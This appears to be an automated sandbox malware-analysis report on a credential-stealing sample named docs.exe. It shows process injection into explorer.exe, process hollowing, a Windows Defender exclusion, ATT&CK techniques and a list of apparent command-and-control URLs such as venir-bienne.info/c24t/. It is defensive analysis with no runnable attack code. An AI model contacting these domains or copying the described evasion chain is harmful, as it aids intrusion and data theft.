          Source: explorer.exe, 00000006.00000000.2152514438.00000000013A1000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000006.00000002.4587672310.00000000013A0000.00000002.00000001.00040000.00000000.sdmp; Binary or memory string: IProgram Manager
          Source: explorer.exe, 00000006.00000000.2152514438.00000000013A1000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000006.00000002.4587672310.00000000013A0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000006.00000002.4598869980.00000000048E0000.00000004.00000001.00020000.00000000.sdmp; Binary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000006.00000000.2152514438.00000000013A1000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000006.00000002.4587672310.00000000013A0000.00000002.00000001.00040000.00000000.sdmp; Binary or memory string: Progman
          Source: explorer.exe, 00000006.00000002.4585859944.0000000000D60000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.2150991767.0000000000D69000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: +Progman
          Source: explorer.exe, 00000006.00000000.2152514438.00000000013A1000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000006.00000002.4587672310.00000000013A0000.00000002.00000001.00040000.00000000.sdmp; Binary or memory string: Progmanlock
          Source: explorer.exe, 00000006.00000000.2158468861.00000000098AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3727331573.00000000098E3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2979257324.00000000098AD000.00000004.00000001.00020000.00000000.sdmp; Binary or memory string: Shell_TrayWnd31A
          Source: C:\Windows\SysWOW64\wscript.exe; Code function: GetUserDefaultLCID,GetLocaleInfoW,GetModuleFileNameW,FreeLibrary,GetLocaleInfoA,LoadStringA,GetModuleFileNameA,CharNextA,memcpy,strcpy_s,LoadLibraryExA,LoadLibraryExA,sprintf_s,CharNextA,memcpy,strcpy_s,LoadLibraryExA,LoadLibraryExA,GetUserDefaultLCID,GetLocaleInfoA,sprintf_s,CharNextA,memcpy,strcpy_s,LoadLibraryExA,LoadLibraryExA, 8_2_0059544C
          Source: C:\Windows\SysWOW64\wscript.exe; Code function: GetLocaleInfoW,wcsncmp, 8_2_00597084
          Source: C:\Users\user\Desktop\docs.exe; Queries volume information: C:\Users\user\Desktop\docs.exe VolumeInformation
          Source: C:\Users\user\Desktop\docs.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
          Source: C:\Users\user\Desktop\docs.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
          Source: C:\Users\user\Desktop\docs.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
          Source: C:\Users\user\Desktop\docs.exe; Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
          Source: C:\Users\user\Desktop\docs.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_005979A0 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,8_2_005979A0
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_0058B8C3 RegisterEventSourceW,GetUserNameW,LookupAccountNameW,LookupAccountNameW,ReportEventW,DeregisterEventSource,SysFreeString,RegCloseKey,RegCloseKey,8_2_0058B8C3
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_005891C6 SysAllocString,GetVersionExA,IsTextUnicode,MultiByteToWideChar,GetLastError,SysAllocStringLen,MultiByteToWideChar,GetLastError,_swab,memmove,SysFreeString,8_2_005891C6
          Source: C:\Users\user\Desktop\docs.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

Stealing of Sensitive Information

Source: Yara match | File source: 5.2.docs.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.2.docs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000008.00000002.4586188983.0000000002F20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000002.4587647793.00000000048D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.2160886912.000000000480A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000002.4585739140.0000000002A00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.2212769489.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY

Remote Access Functionality

Source: Yara match | File source: 5.2.docs.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.2.docs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000008.00000002.4586188983.0000000002F20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000002.4587647793.00000000048D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.2160886912.000000000480A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000002.4585739140.0000000002A00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.2212769489.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: C:\Windows\SysWOW64\wscript.exe | Code function: 8_2_00591170 CreateBindCtx,CreateFileMoniker,MkParseDisplayName,8_2_00591170
Source: C:\Windows\SysWOW64\wscript.exe | Code function: 8_2_00589D9A CreateBindCtx,SysFreeString,SysAllocStringByteLen,8_2_00589D9A
Source: C:\Windows\SysWOW64\wscript.exe | Code function: 8_2_0058DEED CoCreateInstance,CoCreateInstance,GetUserDefaultLCID,CoGetClassObject,CreateBindCtx,8_2_0058DEED
MITRE ATT&CK Matrix (the interactive matrix was flattened in extraction; listed below, by tactic, are only the techniques the report marks as observed for this sample; the per-technique signature counts did not survive extraction and are omitted):

Execution: Shared Modules
Persistence: DLL Side-Loading
Privilege Escalation: Abuse Elevation Control Mechanism, DLL Side-Loading, Process Injection
Defense Evasion: Disable or Modify Tools, Deobfuscate/Decode Files or Information, Abuse Elevation Control Mechanism, Obfuscated Files or Information, Software Packing, Timestomp, DLL Side-Loading, Rootkit, Masquerading, Virtualization/Sandbox Evasion, Process Injection
Credential Access: Credential API Hooking
Discovery: System Time Discovery, Account Discovery, File and Directory Discovery, System Information Discovery, Security Software Discovery, Process Discovery, Virtualization/Sandbox Evasion, Application Window Discovery, System Owner/User Discovery
Collection: Archive Collected Data, Credential API Hooking
Command and Control: Ingress Tool Transfer, Encrypted Channel, Non-Application Layer Protocol, Application Layer Protocol
Behavior Graph ID: 1522819 | Sample: docs.exe | Start date: 30/09/2024 | Architecture: WINDOWS | Score: 100
Contacted domains: www.venir-bienne.info, www.uijiuw.top, and 9 other IPs or domains
Top-level signatures: Suricata IDS alerts for network traffic; Found malware configuration; Malicious sample detected (through community Yara rule); 9 other signatures

Process tree (reconstructed from the flattened behavior graph):
docs.exe (started) - dropped C:\Users\user\AppData\Local\...\docs.exe.log (ASCII); signatures: Adds a directory exclusion to Windows Defender; Tries to detect virtualization through RDTSC time measurements; Switches to a custom stack to bypass stack traces
    docs.exe (started) - signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Sample uses process hollowing technique; 2 other signatures
        explorer.exe (injected) - network: www.oko.events 185.26.122.70, 49727, 80 (HOSTLANDRU, Russian Federation); www.j88.travel 188.114.96.3, 49733, 80 (CLOUDFLARENETUS, European Union); signature: System process connects to network (likely due to code injection or exploit)
            wscript.exe (started) - signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Tries to detect virtualization through RDTSC time measurements; Switches to a custom stack to bypass stack traces
                cmd.exe (started)
                    conhost.exe (started)
    powershell.exe (started) - signature: Loading BitLocker PowerShell Module
        WmiPrvSE.exe (started)
        conhost.exe (started)

Antivirus detection (Source | Detection | Scanner | Label):
docs.exe | 45% | ReversingLabs | ByteCode-MSIL.Spyware.Negasteal
docs.exe | 100% | Joe Sandbox ML |
No Antivirus matches
                                                                                http://www.autoitscript.com/autoit3/Jexplorer.exe, 00000006.00000003.2981207775.000000000C3E9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2986623556.000000000C40D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.2163588037.000000000C3E9000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                  unknown
                                                                                  http://www.earing-tests-69481.bondexplorer.exe, 00000006.00000003.3727039722.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2986139173.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4607845759.000000000C520000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                    unknown
                                                                                    http://www.venir-bienne.info/c24t/explorer.exe, 00000006.00000003.3727039722.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2986139173.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4607845759.000000000C520000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                      unknown
                                                                                      https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earningsexplorer.exe, 00000006.00000000.2154066848.00000000073E5000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                      • URL Reputation: safe
                                                                                      unknown
                                                                                      http://www.consuyt.xyz/c24t/explorer.exe, 00000006.00000003.3727039722.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2986139173.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4607845759.000000000C520000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                        unknown
                                                                                        https://api.msn.com/v1/news/Feed/Windows?activityId=435B7A89D7D74BDF801F2DA188906BAF&timeOut=5000&ocexplorer.exe, 00000006.00000002.4600082648.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3077028884.0000000007414000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.2154066848.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3727707156.0000000007414000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                          unknown
                                                                                          https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNewexplorer.exe, 00000006.00000002.4600082648.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3077028884.0000000007414000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.2154066848.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3727707156.0000000007414000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                          • URL Reputation: safe
                                                                                          unknown
                                                                                          https://www.msn.com/en-us/travel/news/you-can-t-beat-bobby-flay-s-phoenix-airport-restaurant-one-of-explorer.exe, 00000006.00000002.4600082648.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3077028884.0000000007414000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.2154066848.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3727707156.0000000007414000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                            unknown
                                                                                            http://www.khizmetlergirisyapzzz2024.net/c24t/www.23fd595ig.autosexplorer.exe, 00000006.00000003.3727039722.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2986139173.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4607845759.000000000C520000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                              unknown
                                                                                              http://www.amilablackwell.online/c24t/explorer.exe, 00000006.00000003.3727039722.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2986139173.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4607845759.000000000C520000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                unknown
                                                                                                http://www.delark.clickexplorer.exe, 00000006.00000003.3727039722.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2986139173.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4607845759.000000000C520000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                  unknown
                                                                                                  http://www.aithful.eventsReferer:explorer.exe, 00000006.00000003.3727039722.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2986139173.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4607845759.000000000C520000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                    unknown
                                                                                                    https://android.notify.windows.com/iOSexplorer.exe, 00000006.00000000.2163588037.000000000BFDF000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                    • URL Reputation: safe
                                                                                                    unknown
                                                                                                    https://outlook.comeexplorer.exe, 00000006.00000003.3077968513.000000000C086000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2987216711.000000000C086000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.2163588037.000000000C048000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4606870784.000000000C071000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2986355937.000000000C06D000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                      unknown
                                                                                                      https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppexplorer.exe, 00000006.00000000.2158468861.00000000099AB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2979257324.00000000099AB000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                        unknown
                                                                                                        https://www.msn.com/en-us/news/us/dumb-and-dumber-12-states-with-the-absolute-worst-education-in-theexplorer.exe, 00000006.00000002.4600082648.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3077028884.0000000007414000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.2154066848.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3727707156.0000000007414000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                          unknown
                                                                                                          http://www.oko.events/c24t/www.consuyt.xyzexplorer.exe, 00000006.00000003.3727039722.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2986139173.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4607845759.000000000C520000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                            unknown
                                                                                                            http://www.ridges-freezers-56090.bond/c24t/explorer.exe, 00000006.00000002.4607845759.000000000C520000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                              unknown
                                                                                                              http://www.khizmetlergirisyapzzz2024.netReferer:explorer.exe, 00000006.00000003.3727039722.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2986139173.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4607845759.000000000C520000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                unknown
                                                                                                                http://www.j88.travel/c24t/www.venir-bienne.infoexplorer.exe, 00000006.00000003.3727039722.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2986139173.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4607845759.000000000C520000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                  unknown
                                                                                                                  http://www.hecreature.tech/c24t/www.ealerslot.netexplorer.exe, 00000006.00000003.3727039722.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2986139173.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4607845759.000000000C520000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                    unknown
                                                                                                                    https://www.msn.com/en-us/news/politics/kevin-mccarthy-s-ouster-as-house-speaker-could-cost-gop-its-explorer.exe, 00000006.00000002.4600082648.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3077028884.0000000007414000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.2154066848.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3727707156.0000000007414000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                      unknown
                                                                                                                      http://www.23fd595ig.autosexplorer.exe, 00000006.00000003.3727039722.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2986139173.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4607845759.000000000C520000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                        unknown
                                                                                                                        http://www.consuyt.xyz/c24t/www.hecreature.techexplorer.exe, 00000006.00000003.3727039722.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2986139173.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4607845759.000000000C520000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                          unknown
                                                                                                                          http://www.hecreature.techexplorer.exe, 00000006.00000003.3727039722.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2986139173.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4607845759.000000000C520000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                            unknown
                                                                                                                            https://api.msn.com/v1/news/Feed/Windows?explorer.exe, 00000006.00000000.2157815827.000000000962B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4603162290.000000000962B000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                              unknown
                                                                                                                              https://api.msn.com/Iexplorer.exe, 00000006.00000000.2157815827.000000000962B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4603162290.000000000962B000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                unknown
                                                                                                                                http://www.ealerslot.netReferer:explorer.exe, 00000006.00000003.3727039722.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2986139173.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4607845759.000000000C520000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                  unknown
                                                                                                                                  http://www.earing-tests-69481.bond/c24t/explorer.exe, 00000006.00000003.3727039722.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2986139173.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4607845759.000000000C520000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                    unknown
                                                                                                                                    http://www.aithful.events/c24t/www.amilablackwell.onlineexplorer.exe, 00000006.00000003.3727039722.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2986139173.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4607845759.000000000C520000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                      unknown
                                                                                                                                      http://www.ridges-freezers-56090.bondexplorer.exe, 00000006.00000003.3727039722.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2986139173.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4607845759.000000000C520000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                        unknown
                                                                                                                                        http://schemas.microexplorer.exe, 00000006.00000000.2155015039.0000000007B50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000006.00000000.2155041109.0000000007B60000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000006.00000002.4588766205.00000000028A0000.00000002.00000001.00040000.00000000.sdmpfalse
                                                                                                                                        • URL Reputation: safe
                                                                                                                                        unknown
                                                                                                                                        http://www.eviewmadu.topReferer:explorer.exe, 00000006.00000003.3727039722.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2986139173.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4607845759.000000000C520000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                          unknown
                                                                                                                                          http://www.hecreature.techReferer:explorer.exe, 00000006.00000003.3727039722.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2986139173.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4607845759.000000000C520000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                            unknown
                                                                                                                                            http://www.uijiuw.top/c24t/explorer.exe, 00000006.00000003.3727039722.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2986139173.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4607845759.000000000C520000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                              unknown
